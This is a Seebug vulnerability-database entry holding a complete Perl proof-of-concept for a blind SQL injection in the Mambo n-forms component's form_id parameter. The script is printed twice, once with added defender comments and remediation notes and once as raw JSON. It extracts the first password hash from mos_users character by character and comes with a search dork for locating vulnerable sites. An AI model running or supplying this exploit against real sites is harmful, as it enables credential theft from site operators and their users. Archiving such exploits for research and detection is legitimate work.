ID SSV:9991
Type seebug
Reporter Root
Modified 2008-11-09T00:00:00
Description
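No description provided by source. From the listing below: a proof-of-concept for a blind (boolean-based) SQL injection in the `form_id` request parameter of the Mambo n-forms component (`option=com_n-forms`). The script appends a SQL condition to `form_id` and reads the answer from whether the response page contains the string "Back", recovering the first `password` value in `mos_users` one character at a time. Remediation belongs in the component: validate or cast `form_id` to an integer and bind it as a query parameter instead of concatenating it into the statement. In web-server logs the activity appears as a burst of near-identical GET requests whose `form_id` value contains `and ascii(SUBSTRING((SELECT`.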
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
# Usage guard: unless a second positional argument (the path) is present and
# true, print the banner and stop. The test is on truthiness, so a path of
# "0" or "" also ends up here.
unless ($ARGV[1])
{
    # "Title" is not a Perl builtin; the string is handed to the system shell.
    # NOTE(review): looks like the Windows console-title command -- on other
    # shells this is presumably a failed command lookup; confirm.
    system("Title Kosova Hackers Group by boom3rang");

    # Banner text, emitted verbatim. It documents only -a, although the
    # GetOptions call further down in this script also accepts -u and -p.
    my @banner = (
        " \n",
        " #######################################################################\n",
        " # Mambo Component n-form(form_id) Blind SQL Injection Exploit \n",
        " # -----------------------------------------------------------\n",
        " # Author: boom3rang [www.khg-crew.ws] \n",
        " # Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n",
        " # Site: www.khg-crew.ws\n",
        " # -----------------------------------------------------------\n",
        " # Dork : inurl:option=com_n-forms form_id \n",
        " # Usage: perl exploit.pl host path <options> \n",
        " # Example: perl exploit.pl www.host.com /path/ -a 3 \n",
        " # -----------------------------------------------------------\n",
        " # Options: \n",
        " # -a valid form id \n",
        " #######################################################################\n",
    );
    print @banner;
    exit;
}
# Positional arguments are copied out of @ARGV before option parsing. Both
# host and path are later concatenated into the request URL as-is; the script
# performs no validation on them.
my ($host, $path) = @ARGV[0, 1];
my $userid = 1;

# Third positional slot is the fallback form id. With the invocation shown in
# the banner ("host path -a 3") this slot holds the literal "-a" until the
# parsed -a value replaces it below.
my $aid = $ARGV[2];

# Accepted options: -u <integer>, -p <string>, -a <integer>. The -p value is
# read by istrue2() as an HTTP proxy address.
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";

# Parsed values replace the defaults only when they are true, so "-u 0" and
# "-a 0" are ignored.
$userid = $options{"u"} if $options{"u"};
$aid    = $options{"a"} if $options{"a"};
# Character-by-character recovery loop. The value is treated as 32 characters
# long (the output label calls it an MD5 hash); each position is resolved by
# asking istrue2() one yes/no question per candidate character code.
#
# Traffic profile, useful for detection: candidates are ASCII 48-57 ('0'-'9')
# followed by 97-122 ('a'-'z'), so a run issues up to 36 requests per position
# and up to 1152 GET requests in total, differing only in two integers inside
# the form_id value.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);

POSITION:
for my $pos (1 .. 32)
{
    for my $code (48 .. 57, 97 .. 122)
    {
        next unless istrue2($host, $path, $userid, $aid, $pos, $code);

        # The first candidate answered "true" is taken as the character at
        # this position; continue with the next position.
        syswrite(STDOUT, chr($code), 1);
        next POSITION;
    }
    # No candidate matched: nothing is printed for this position and no error
    # is reported, so the printed value can be shorter than 32 characters.
}
print "\n[~] Exploiting done\n";
# istrue2(host, path, uid, aid, i, h) -> 1 | 0
#
# Sends one GET request whose form_id parameter carries an appended boolean
# condition ("<aid> and ascii(SUBSTRING(...,<i>,1))=<h>") and returns 1 when
# the response body contains the marker string "Back", otherwise 0.
#
# Defender notes:
#   * The request only works as a true/false oracle if the component places
#     form_id into its SQL statement unquoted and unvalidated -- presumably
#     the root cause; the component source is not shown here. Casting form_id
#     to an integer, or binding it as a query parameter, removes the condition.
#   * Log / WAF signature: option=com_n-forms with a form_id value containing
#     (possibly percent-encoded) spaces and
#     "ascii(SUBSTRING((SELECT password FROM mos_users".
#   * uid is accepted but never used, so the -u option has no effect on the
#     query; the sub-select always takes the first row (LIMIT 0,1).
#   * The response status is not inspected: a failed or blocked request reads
#     as "false" unless its body happens to contain "Back".
sub istrue2
{
    my ($host, $path, $uid, $aid, $i, $h) = @_;

    my $ua = LWP::UserAgent->new;

    # The URL is assembled by plain concatenation; the script itself does no
    # URL-encoding or escaping of any part.
    my $query = join('',
        "http://", $host, $path,
        "index.php?option=com_n-forms&form_id=", $aid,
        " and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),", $i,
        ",1))=", $h, "");

    # An optional -p value (file-level %options) is used as the HTTP proxy.
    $ua->proxy('http', "http://".$options{"p"}) if $options{"p"};

    my $content = $ua->get($query)->content;
    my $regexp = "Back";

    return ($content =~ /$regexp/) ? 1 : 0;
}
{"href": "https://www.seebug.org/vuldb/ssvid-9991", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-09T00:00:00", "title": "Mambo Component n-form (form_id) Blind SQL Injection Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9991", "cvelist": [], "description": "No description provided by source.", "viewCount": 7, "published": "2008-11-09T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\nsystem("Title Kosova Hackers Group by boom3rang"); \r\n print " \\n";\r\n print " #######################################################################\\n";\r\n print " # Mambo Component n-form(form_id) Blind SQL Injection Exploit \\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Author: boom3rang [www.khg-crew.ws] \\n";\r\n print " # Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\\n";\r\n print " # Site: www.khg-crew.ws\\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Dork : inurl:option=com_n-forms form_id \\n";\r\n print " # Usage: perl exploit.pl host path <options> \\n";\r\n print " # Example: perl exploit.pl www.host.com /path/ -a 3 \\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Options: \\n";\r\n print " # -a valid form id \\n";\r\n print " #######################################################################\\n";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $userid = 1;\r\nmy $aid = $ARGV[2];\r\n\r\nmy %options = ();\r\nGetOptions(\\%options, "u=i", "p=s", "a=i");\r\n\r\nprint "[~] Exploiting...\\n";\r\n\r\nif($options{"u"})\r\n{\r\n $userid = $options{"u"};\r\n}\r\n\r\nif($options{"a"})\r\n{\r\n $aid = $options{"a"};\r\n}\r\n\r\nsyswrite(STDOUT, "[~] MD5-Hash: ", 14);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $f = 0;\r\n my $h = 48;\r\n 
while(!$f && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $userid, $aid, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$f)\r\n {\r\n $h = 97;\r\n while(!$f && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $userid, $aid, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint "\\n[~] Exploiting done\\n";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $uid = shift;\r\n my $aid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";\r\n\r\n if($options{"p"})\r\n {\r\n $ua->proxy('http', "http://".$options{"p"});\r\n }\r\n\r\n my $resp = $ua->get($query);\r\n my $content = $resp->content;\r\n my $regexp = "Back";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n\r\n}\n ", "id": "SSV:9991", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:21:35", "reporter": "Root", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T21:21:35", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:21:35", "rev": 2}, "vulnersScore": 0.4}, "references": []}
{}